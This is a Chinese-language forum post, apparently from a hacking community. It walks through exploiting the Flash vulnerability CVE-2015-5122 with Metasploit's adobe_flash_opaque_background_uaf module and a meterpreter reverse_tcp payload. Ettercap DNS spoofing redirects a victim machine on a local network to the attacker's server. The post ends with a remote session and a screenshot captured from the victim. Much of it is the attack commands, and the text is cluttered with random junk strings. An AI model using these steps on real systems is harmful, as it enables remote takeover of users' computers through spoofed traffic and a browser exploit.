找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1895|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

1 [. Z; I, N) Q# { 二、cve2015-5122漏洞实例演示虚拟机 3 U9 o: Q7 w9 U$ k# d9 F }

7 `' P1 o* L, `* _

/ Z# u+ Q& K$ h, u* J$ X8 p5 g   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 3 N8 m# w0 U: ~

4 o# i$ A i A6 D0 h/ J% {; k

' n5 O% e4 y9 S1 G. K' r% Y5 N search cve-2015-5122如图: % ~. i& g: T! f

$ q* a1 F% r9 e! ~* s% ]

( b: x5 e6 ^) c# C/ |   + o- g7 z2 Q+ l. U

2 O# A! c# t5 f

. F# m) k/ \8 `9 e6 o: i 下面我们敲如下命令: ; q: A1 i( y: f' G* X' i; x5 B

9 E5 B( C) p- F! y# q4 [ j

3 D: {5 P; C5 ]! k use exploit/multi/browser/adobe_flash_opaque_background_uaf * _) J) p, d8 e+ G- l' j$ H

% t) s% F& n/ {

2 |- B$ @0 p$ T5 {& D4 }- t% b set PAYLOAD windows/meterpreter/reverse_tcp 0 }/ p4 v6 Z# w; Y5 b! R

7 u6 Q) `% C" _; C8 Y4 L, l8 W

) j4 Y# k, ]$ K" E set LHOST 192.168.0.109 + u6 U$ w9 [3 H; L

7 ]3 v9 E! i* o/ Q+ i' _5 G' C Y

r# l6 I* p. _8 N$ t, g set URIPATH /                        /*根目录*/ ( M2 Y- l: ]' {7 }

& Z6 R7 \7 y- D4 {: l

* b6 U; B: l2 }/ H set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 9 [$ r5 i: } H% x- i) t

" S! Z2 V- l+ K

& t. ~8 ^2 ]$ ^: n# A$ V set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 2 o$ O9 X/ K# `0 u# p

) B: G) a2 }* [0 o. I- L

1 x7 j! y! f) I8 E/ p 然后show options如图: 4 I8 E: d6 N# ]& k/ q3 J

! N& ]. u' H2 Q8 n8 }

6 E! z) v0 X' ^% f   # z/ q0 O1 ~! n. ?5 J. p: z' K

/ C$ U6 p) w+ S

( u6 m. S! A6 [2 Z- k7 x$ {5 N 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
- i$ R l8 o. D- e
" s+ h) Y5 J1 f

* `0 U5 ]3 w( G

: [2 y- \& ?( K, p8 a6 A 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 9 s8 {4 d# {) w+ D

8 L% O5 [4 x" x: w! L

" S( p& K0 m: C" p Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf 6 l/ B, v4 T8 g0 M7 Z6 R

( }& z& n0 k* O$ E

, E4 }# S) Q* a r% N; k$ A   3 R5 E8 I) G8 q- T

( Y/ e- o/ u3 b: D

3 |. t$ b2 ?+ ?: O 成功了,这时候我们断开ettercap,如图: 9 |" H5 h; `% L& ~) @7 ?7 d

' z( ], g8 ^0 k: ?

7 { V {) \8 @" W, s1 X1 q8 G, M   ; E0 _: A7 F6 e$ b" u/ {1 y

& Y3 X4 A, v! f; Q j: J- f

% o* s( e) k$ a3 G Screenshot如图: % a2 z) P! [% n0 g) V0 v

3 O4 U9 i; \) m2 h, F) ]1 n0 y9 V6 c

( F3 j( W1 h0 r0 H" @   W) K2 A8 j* Q! M

8 ^( e e1 g6 A

E! j1 J" ?. v1 }4 Q1 _$ Q . |" e9 s3 ^' J% w

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表